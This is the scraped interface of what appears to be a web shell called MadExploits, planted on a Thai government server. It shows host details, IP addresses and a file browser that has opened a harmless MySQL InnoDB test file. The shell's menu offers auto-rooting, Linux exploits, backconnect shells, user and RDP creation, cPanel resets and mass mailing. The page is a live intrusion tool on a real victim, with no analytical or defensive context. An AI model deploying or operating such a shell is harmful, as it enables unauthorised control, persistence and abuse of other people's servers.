Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
mysql-test /
suite /
innodb_plugin /
include /
[ HOME SHELL ]
Name
Size
Permission
Action
ctype_innodb_like.inc
665
B
-rw-r--r--
innodb-index.inc
1
KB
-rw-r--r--
innodb_trx_weight.inc
861
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : innodb-index.inc
--eval create table t1(a int not null, b int, c char(10), d varchar(20), primary key (a)) engine = innodb default charset=$charset insert into t1 values (1,1,'ab','ab'),(2,2,'ac','ac'),(3,2,'ad','ad'),(4,4,'afe','afe'); commit; --error ER_DUP_ENTRY alter table t1 add unique index (b); insert into t1 values(8,9,'fff','fff'); select * from t1; show create table t1; alter table t1 add index (b); insert into t1 values(10,10,'kkk','iii'); select * from t1; select * from t1 force index(b) order by b; explain select * from t1 force index(b) order by b; show create table t1; alter table t1 add unique index (c), add index (d); insert into t1 values(11,11,'aaa','mmm'); select * from t1; select * from t1 force index(b) order by b; select * from t1 force index(c) order by c; select * from t1 force index(d) order by d; explain select * from t1 force index(b) order by b; explain select * from t1 force index(c) order by c; explain select * from t1 force index(d) order by d; show create table t1; check table t1; drop table t1;
Close